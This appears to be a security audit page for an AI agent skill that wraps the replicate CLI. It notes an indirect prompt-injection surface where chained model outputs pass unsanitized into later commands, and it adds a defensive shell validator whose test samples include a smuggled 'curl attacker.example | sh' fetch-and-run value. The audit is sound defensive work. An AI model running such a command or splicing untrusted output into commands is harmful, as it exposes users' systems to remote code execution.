replicate-cli
Pass
Audited by Gen Agent Trust Hub on Feb 21, 2026
Risk Level: SAFE
COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, PROMPT_INJECTION
Full Analysis
- Command Execution (LOW): The skill is primarily a guide for the `replicate` CLI. It provides instructions for running predictions, managing models, and fine-tuning. These commands are executed in the user's terminal and can affect both local and remote resources.
- External Downloads (LOW): The skill recommends using `curl -L` to download model outputs from Replicate URLs. While expected for the tool's purpose, this involves downloading data from external sources.
- Indirect Prompt Injection (LOW): Category 8: Indirect Prompt Injection surface detected.
  - Ingestion points: Untrusted data enters the context via the `{{.output[0]}}` template syntax used in the Output Chaining section of `SKILL.md`.
  - Boundary markers: Absent; the skill does not suggest using delimiters or 'ignore' instructions when chaining model outputs.
  - Capability inventory: The skill uses `replicate run` and `replicate train` (subprocess/CLI execution) as its primary capabilities.
  - Sanitization: Absent; model outputs are passed directly as inputs to subsequent commands without validation.
- Dynamic Execution (LOW): The `replicate scaffold` command generates local project files (Node.js or Python) based on remote prediction IDs. This is a standard feature of the CLI, but it involves generating code from external data.
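The two findings above that matter in practice are the same gap seen from two sides: a chained `{{.output[0]}}` value is interpolated into the next command line, and `curl -L` is then pointed at whatever that value says. The shell functions below are an added example written for this audit page, not code from the skill or from Replicate. They gate a chained output before it reaches either a command line or curl: the value must be a bare `https://` URL with no whitespace or shell metacharacters, its host must be `replicate.delivery` or a subdomain of it (the output host is an assumption here; adjust to the hosts your predictions actually return), and the download is pinned to https-only redirects, a size cap and a caller-chosen destination filename. The `fetch_output` helper and its curl flags are standard curl options; the sample URLs at the bottom are constructed for illustration.

```shell
#!/bin/sh
# Added example for the replicate-cli audit: validate a chained model output
# before it is used as a command argument or downloaded. Not part of the skill.
set -eu

# Return 0 only for a plain https URL on the assumed output host
# (replicate.delivery or a subdomain), with a non-empty path and none of the
# characters that would let {{.output[0]}} break out of a command line.
is_trusted_output_url() {
  url="$1"
  # Reject whitespace and shell metacharacters outright.
  case "$url" in
    ''|*[[:space:]]*|*[\'\"\`\$\;\|\&\<\>\(\)]*) return 1 ;;
  esac
  # Scheme must be https; strip it to isolate the host.
  case "$url" in
    https://*) rest="${url#https://}" ;;
    *) return 1 ;;
  esac
  host="${rest%%/*}"
  # No user-info or port tricks; host is the allowlisted domain or a subdomain.
  # Matching on the extracted host (not the whole URL) stops
  # https://evil.example/replicate.delivery/... from slipping through.
  case "$host" in
    ''|*@*|*:*) return 1 ;;
    replicate.delivery|*.replicate.delivery) ;;
    *) return 1 ;;
  esac
  # Require a non-empty path component after the host.
  if [ "$rest" = "$host" ] || [ -z "${rest#"$host"/}" ]; then
    return 1
  fi
  return 0
}

# Download a validated output. The destination filename is chosen by the
# caller, never taken from the remote URL; redirects are restricted to https
# and the body is capped at 100 MiB.
fetch_output() {
  url="$1"
  dest="$2"
  if ! is_trusted_output_url "$url"; then
    echo "refusing untrusted output URL: $url" >&2
    return 1
  fi
  curl --fail --location --proto '=https' --proto-redir '=https' \
       --max-filesize 104857600 --output "$dest" "$url"
}

# Constructed sample values standing in for a chained {{.output[0]}}.
for candidate in \
  'https://replicate.delivery/pbxt/abc123/out.png' \
  'https://evil.example/replicate.delivery/out.png' \
  'https://replicate.delivery.evil.example/out.png' \
  'http://replicate.delivery/out.png' \
  'https://replicate.delivery/out.png; curl attacker.example | sh'
do
  if is_trusted_output_url "$candidate"; then
    printf 'OK      %s\n' "$candidate"
  else
    printf 'REJECT  %s\n' "$candidate"
  fi
done
```

Only the first sample passes; the others are rejected for a foreign host, a look-alike subdomain, a non-https scheme, and embedded shell metacharacters respectively. When the chained output is not a URL but free text destined for the next model's prompt, the same principle applies: check the value against the shape you expect and pass it as a single quoted argument, never by splicing it into a command string.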
Audit Metadata